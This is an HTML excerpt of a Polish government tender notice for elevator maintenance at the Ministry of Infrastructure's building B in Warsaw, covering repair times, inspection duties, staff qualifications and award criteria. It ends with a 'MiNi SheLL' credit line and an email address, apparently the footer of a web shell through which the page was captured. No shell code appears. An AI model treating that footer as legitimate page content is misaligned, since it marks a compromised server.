<li>2. termin usuwania usterek - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Konserwacja urządzeń dźwigowych w budynku B Ministerstwa Infrastuktury przy ul. Chałubińskiego 4/6 w Warszawie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonywanie prac konserwacyjnych urządzeń dźwigowych w budynkach Ministerstwa Infrastruktury ma na celu utrzymywanie ich w stałej sprawności technicznej.

ZAKRES KONSERWACJI

Czynności konserwacyjne obejmują:

   1. Całodobowy nadzór pracy urządzeń dźwigowych.
       Usuwanie usterek w terminach nie dłuższych( od momentu zawiadomienia):
1) czas usuwania usterek w przypadku wystąpienia awarii związanej 
    z koniecznością uwolnienia osób                                                                   -   maks.   30 min, 
2) czas usuwania usterek w godzinach pracy Zamawiającego                          -    maks.   60 min,
3) czas usuwania usterek po godzinach pracy Zamawiającego                         -    maks.   90 min.
4) czas usuwania usterek w święta i w dni wolne od pracy                               -    maks. 240 min.
   2. Usuwanie awarii urządzeń dźwigowych i wykonywanie napraw związanych z usuwaniem awarii,                 na podstawie odrębnej umowy (bez uwzględniania kosztów robocizny) w wyniku postępowania                  o udzielenie zamówienia publicznego.
   3. Wykonywanie przeglądów konserwacyjnych o następującym zakresie:
       1) Sprawdzenie przez Wykonawcę:
a)	stanu technicznego występujących mechanizmów napędowych,
b)	działania urządzeń zabezpieczających,
c)	stanu cięgien nośnych i ich zamocowania,  
d)	stanu urządzeń chwytających,
e)	działania urządzeń: napędowych, sterujących, sygnalizacyjnych i oświetleniowych,
f)	stanu instalacji ochrony przeciwporażeniowej
        2) Podczas przeglądów konserwacyjnych Wykonawca winien wykonać:
a)	czyszczenie urządzeń napędowych i sterujących,
b)	smarowanie wszystkich punktów smarowniczych,
c)	smarowanie prowadnic w miarę potrzeb,
d)	usunięcie drobnych usterek i wad,
e)	wymianę drobnych części
        3) Ponadto, co 12 miesięcy Wykonawca winien sprawdzić:
a) stan konstrukcji nośnej (połączeń spawanych, nitowanych, skręcanych),
b) stan zamocowania prowadnic. 
    4.   Prowadzenie Książki wykonywanych prac konserwacyjnych i awarii.
    5. Dostawa niezbędnych materiałów konserwacyjno-eksploatacyjnych zapewniających należytą pracę urządzeń.

       W przypadku stwierdzenia podczas wykonywania czynności konserwacyjnych jakichkolwiek usterek lub niedomagań w pracy urządzeń, należy natychmiast przystąpić do usuwania usterek.
       W ramach konserwacji urządzeń dźwigowych należy wykonywać okresowe przeglądy wszystkich urządzeń, a w przypadku wystąpienia niedomagań w pracy urządzeń, należy wykonać czynności polegające na przywróceniu ich pełnej sprawności.
      Wykonawca zobowiązuje się wykonywać czynności konserwacyjne oraz stosować materiały konserwacyjno-eksploatacyjne zgodnie z wytycznymi producentów urządzeń zawartych w DTR-ach oraz przestrzegać przepisów BHP.


Uwaga
Osoby wykonujące konserwacje lub naprawy, powinny posiadać: ważne zaświadczenie kwalifikacyjne Urzędu Dozoru Technicznego oraz świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją sieci, urządzeń i instalacji o napięciu do 1kV. 
W związku z tym, że urządzenia dźwigowe w budynku B (poz. 3, 4 i 5 wykazu urządzeń) do końca 2011 roku objęte są gwarancją producenta, tj. przez firmę  HYDROMACH Warszawa, do wykonywania konserwacji tych urządzeń wymagane jest przedstawienie dokumentu autoryzacji wydanej przez tę firmę, bądź też pisemne zobowiązanie Wykonawcy na przejęcie obowiązków gwaranta na warunkach określonych w karcie gwarancyjnej producenta (do wglądu u Zamawiającego) urządzenia dźwigowego.

Zamawiający wymaga dostarczenia aprobat, certyfikatów na materiały konserwacyjno-eksploatacyjne, zastosowane do wykonania zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.14.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin usunięcia usterek - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com